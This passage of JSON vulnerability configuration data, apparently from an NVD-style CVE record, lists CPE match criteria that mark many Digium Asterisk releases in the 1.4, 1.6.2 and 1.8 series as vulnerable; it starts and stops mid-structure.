              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6AB8988-FCC6-407A-A7D9-2F7A3A7488B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CF342950-FDD7-41A9-94D5-EDF41130B61E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E4543AA-3D54-4444-AD1F-381A87A89DA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "AF3036DD-261C-4975-A01E-92CD29479588",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "EF07C116-27DC-4875-9DCF-049E2A8EAEA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CBF2301E-F6EF-4D28-82EE-FA1AB8CA9E43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "A53F637C-846A-43FC-BA71-C8571648FA46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E61070F4-1B6B-4814-918E-459DE5119A24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "70664E0F-09CF-42C2-A7A7-E635D022E90D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D1E13E1A-C2D4-4E5A-84C8-E6AF061D67C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E811134-B657-4C50-9AEF-A7F68CA5577A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C4CD101-F079-4940-AA79-886B69A7A514",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B7B828E9-5BE3-4E6F-8048-F2B1F2E929CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "75BB2066-74A6-4F89-B54C-35F234DC1F03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE522334-BF53-4E34-949B-CD928B59A341",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "648DEC0E-3CBC-4EA2-AF27-2C518B0762CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B50F4BAE-D00D-4352-B52B-BE1A9FFB6949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7A35508-8235-4915-8810-12B2630C82C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "63DD4EE5-6F56-41C7-9CB4-16ADF4F63B8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2347E451-2F89-4EA6-A6E0-22BCB0C8A56E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A86F5360-6FE4-4EA2-9208-076E78C842A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3CDFA85B-17A4-4ECC-9922-F5546917B4C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D7D7DB7-32A7-490E-AED2-C404D371E7C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "A03632BC-CA0F-42BD-8839-A72DB146A4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9DC4EF64-6A1D-47CB-AC07-48CABB612DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68C00FEF-7850-48F4-8122-4211D080B508",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3A48F07-42E1-47E9-94EA-44D20A0BAC3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D16470-5892-4289-BB35-B69100BCA31E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "15E71BD7-83D1-4E2B-AD40-BB6B53056C89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FDE2E2-5F08-43EF-BBD8-7DCCC0C98870",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:*:*:*:*:*:*:*",
              "matchCriteriaId": "347E9D8C-A372-41F2-AB48-FFCAB454C9C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74F67E57-1DD0-4850-8D7E-7A9748BD106C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:*:*:*:*:*:*:*",
              "matchCriteriaId": "B208C056-B567-4BEE-A9B7-AEB394341D5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0C3A2D4-07A9-4D28-AC18-03523E9FF34A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6516E0F-9F60-4D20-88D3-B9CD8DC93062",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "22147B91-45A4-4834-AC8D-2DC17A706BEF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "677C10DE-46D8-4EF1-BF22-63F3AE37CBC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E299CE20-B02D-4519-AC46-BB64B1E3826A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:*:*:*:*:*:*:*",
              "matchCriteriaId": "22FD16C3-7518-4208-8C0A-043C13C14A72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2461B6B9-2C93-4D84-A1EE-C07AD32A9540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8A4CE2D-FBAB-4C35-846A-5B95BBCAD6BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "30FFB6F4-1BC7-4D4C-9C65-A66CF514E321",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
